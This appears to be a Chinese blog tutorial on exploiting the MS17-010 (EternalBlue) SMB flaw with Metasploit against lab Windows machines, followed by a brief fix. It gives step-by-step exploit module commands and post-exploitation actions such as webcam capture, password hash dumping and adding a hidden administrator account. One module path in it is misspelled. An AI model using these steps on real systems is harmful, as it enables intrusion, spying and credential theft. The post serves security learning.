MS17-010(Eternal blue永恒之蓝)各模块利用

已于 2022-07-02 09:04:55 修改
阅读量1.3k 收藏 8
点赞数 1
分类专栏: 系统漏洞 文章标签: 网络
于 2022-06-20 12:43:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/star1941761196/article/details/125370464
版权

前言:
提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议。

影响:

影响版本: win xp、win server 03、win server 08、 win 7
影响端口服务: 445(SMB服务)

准备工作:

靶机:win7,win server2008,win xp,win 2003
攻击机:kali 2021

一、扫描模块

auxiliary/scanner/smb/smb_ms17_010模块利用

​
//扫描靶机是否存在ms17-010漏洞
//调用模块
use auxiliary/scanner/smb/smb_ms17_010
//设置ip
set rhosts 192.168.10.204
//运行
run
​

二、攻击模块

1、auxiliary/amin/smb/ms17_010_command模块利用

影响版本:windows server 2003、windows xp
  
//进入msf模块下调用模块
#msfconsole
//调用模块
use auxiliary/amin/smb/ms17_010_command
//设置ip
set rhosts 192.168.10.110
//设置要运行的命令
set command whoami
//运行
run

2、exploit/windows/smb/ms17_010_psexec模块利用

影响版本:win server 2003、win xp
  
//调用模块
use exploit/windows/smb/ms17_010_psexec
//设置ip
set rhosts 192.168.10.111
//运行
run

3、exploit/windows/smb/ms17_010_eternalblue模块利用

影响版本:win7、win server 2008
  
//调用模块
use exploit/windows/smb/ms17_010_eternalblue
//设置ip
set rhosts 192.168.10.204
//运行
run

三、利用漏洞

1、payload选择:

//进入meterpreter模块,可获取shell
windows/x64/meterpreter/reverse_tcp
//实时监控靶机屏幕
windows/x64/vncinject/bind_tcp

2、meterpreter模式

webcam_stream 开启摄像头
screenshot 截图
run vnc 屏幕监控(若对方有安全软件会失败)
run post/windows/manage/enable_rdp 开启3389
rdesktop [ip] 连接远程桌面
hashdump 获取密码
upload [本机] [目标靶机] 上传文件
download [目标靶机文件]
开启一个网页实时监控屏幕

3、进入shell

在meterpreter模式下输入shell,即可进入shell模式
whoami 查看系统权限
net user [用户名称] [密码] /add 添加用户
net localgroup administrators [用户] /add 添加用户到管理员组
  
监控屏幕
//设置payload
set payload windows/x64/vncinject/bind_tcp
//运行
run
实时监控靶机屏幕

加固:

禁用server服务
win+r搜索services.msc
进入服务管理页面
找到server服务,将它禁用

验证:

再次调用模块进行测试,已经无法进入目标靶机
旧城QwQ
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
E015-渗透测试常用工具-使用Eternal Blues进行Windows漏洞利用.pdf
12-02
E015-渗透测试常用工具-使用Eternal Blues进行Windows漏洞利用
红日安全 vulnstack (一)
逍遥小哥的博客
12-01 221
我们这边整理一下,因为这是我们自己搭建的,所以我们物理机肯定和nat网是通的,但是真实情况是win7nat网是外网,所以不能直接用内网cs做服务器,要用公网做服务器,因为内网cs做服务器,外网是ping不通的内网的。我们现在的问题是没有办法直连这三台主机,因为这三台主机不出网,所以我们需要利用中转服务器做一个sock5代理。那么win7是通外网的,win2003和win2008是不通外网,但是与win7是互通的。大家好,这段时间在玩红日安全的靶场,这个靶场质量非常高,推荐大家玩一玩。
EternalBlue永恒之蓝漏洞复现(MS17-010
最新发布
m0_65615852的博客
04-12 1018
EternalBlue永恒之蓝漏洞复现(ms17-010)超级详细过程
1、(信息收集)记录一次使用永恒之蓝的渗透过程
daxi0ng的博客
03-15 1232
一、通过nmap扫描得知目标机开放了445端口,运行的操作版本为WIN7 2、尝试使用永恒之蓝进行渗透 使用windows/x64/meterpreter/reverse_tcp PAYLOAD 设置好各项参数 成功进入meterperter工具 使用getpid获取Meterpreter Shell的进程号 继续使用ps查看本机运行的进程,选择一个稳定的系统进程,将shell迁移过去 3、或...
利用虚拟机复现漏洞 “永恒之蓝
Goodric的博客
05-09 6930
利用虚拟机复现漏洞“永恒之蓝” 攻击:kali Linux 2020.3 靶机:Windows Server 2008 R2 x64 下面详细讲述测试的过程。 —— —— “ 永恒之蓝 ”简介 利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。于 2017 年在全球的范围内大面积爆发,不法分子利用这个漏洞制作了勒索病毒,锁定被攻击的设备,并要求支付高额赎金。 “ 永恒之蓝 ”的原理主要是扫描所有开放 445 文件共享端口的 Windows 机器。 这里进行测试要用到一个工具 MSF ,能快速
永恒之蓝扫描工具ui版
11-15
图形化的永恒之蓝 扫描工具,发现wannacry smb漏洞就, 安全工具
kail下使用exploit/windows/smb/ms17_010_eternalblue攻击win2k7练习meterpreter
yanyi3271的博客
10-30 2358
1、use exploit/windows/smb/ms17_010_eternalblue options和payload设置如下 2、攻击成功 3、截屏 meterpreter的screenshot命令可以获取活动用户的桌面截屏保存到相应目录 4、sysinfo 这个命令可以获取系统运行的平台 5、获取靶机上的账户密码哈希值 传递哈希值(失败) 6、Meterpreter跳转,并保...
微软EternalBlue永恒之蓝漏洞攻击测试
我的学习笔记
02-28 4849
声明:仅供学习交流使用,个人实验笔记。排版比较懒。微软MS17-010理论:SMBv1 漏洞攻击,445端口。环境准备:攻击资源:攻击工具包 点我攻击者系统:Windows 7 Ultimate (x64) 点我受害者系统:Windows 7 Ultimate (x64) 点我,winXP,win2008,win2003均可。 点我辅助攻击用系统:kal...
网络攻防——永恒之蓝
热门推荐
weixin_46560512的博客
03-09 2万+
主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。
Windows 7 ms17-010永恒之蓝漏洞复现
m0_51600840的博客
07-04 2132
复现ms17-010漏洞环境:1.进入框架:msfconsole 2.使用search命令查找相关漏洞: search ms17-010 3.使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 4.设置本机地址:set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址) 5. 设置靶机地址:set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址) 注意靶机地址和攻
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的...
eternalblue_doublepulsar
11-25
这才是最纯正的eternalblue_doublepulsar!!!!!!!
Art-is-Eternal-Happiness
03-15
Art-is-Eternal-Happiness
cyber-eternal
04-16
你好! 我是 “后端软件工程师|| 云解决方案架构师'' ☰详细 我是后端软件工程师和云解决方案架构师。 我的目标不仅是建立编码,而且还提供相关且清晰的编码方法,以实现尽可能高效... ════════ 来自网络永恒
永恒的卡片插件「Eternal Card Plugin」-crx插件
03-12
查看并链接到您的浏览器中的永恒Warcry卡 一个浏览器,可在浏览各种网站时为粉丝创建永恒战争卡数据库链接,以制作永恒卡游戏。 当前包含的几个站点是RNGEternal.com和Reddit.com。 当将牌组列表悬停在鼠标上时,该...
MS17-010 永恒之蓝漏洞利用方式
weixin_51339377的博客
03-17 6648
Eternal blue永恒之蓝漏洞 windows操作系统漏洞 借助工具Metasploit复现漏洞 利用条件: 1.目标计算机开启445端口 2.一般适用计算机系统 windows7 或windows server2008 R2 攻击机器:kali-Linux 192.168.109.130 目标靶机:windows7 192.168.109.129 1.在黑客机器中对目标计算机进行端口的扫描 发现目标445端口处于开放状态 nmap -p 80,3...
Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010
薛定谔嘚喵博客
04-25 2459
攻击机:Linux kali(IP:192.168.107.129)靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143)实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
公众号shadow sock7
05-18 2446
参考: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalbluewget "https://raw.githubusercontent.com/rapid7/metasploit-framework/6d81ca42087efd6548bfcf924172376d5234a25a/modules/explo
永恒之蓝ms17_010漏洞复现
m0_73005107的博客
11-28 1398
永恒之蓝漏洞复现
ehcache eternal配置
05-27
在 Ehcache 中配置 Eternal 缓存策略很简单,只需要在 Ehcache 的配置文件中设置 `<eternal>` 元素为 `true` 即可,示例如下: ``` <cache name="myCache" maxEntriesLocalHeap="1000" eternal="true" timeToIdleSeconds="0" timeToLiveSeconds="0" overflowToDisk="false"/> ``` 其中,`eternal="true"` 表示启用 Eternal 缓存策略。其他属性的含义如下: - `name`:缓存名称; - `maxEntriesLocalHeap`:缓存最大容量; - `timeToIdleSeconds`:缓存数据空闲时间,单位为秒; - `timeToLiveSeconds`:缓存数据存活时间,单位为秒; - `overflowToDisk`:是否启用磁盘持久化。 需要注意的是,使用 Eternal 缓存策略时,`timeToIdleSeconds` 和 `timeToLiveSeconds` 属性应该设置为 0,表示永久有效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旧城QwQ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值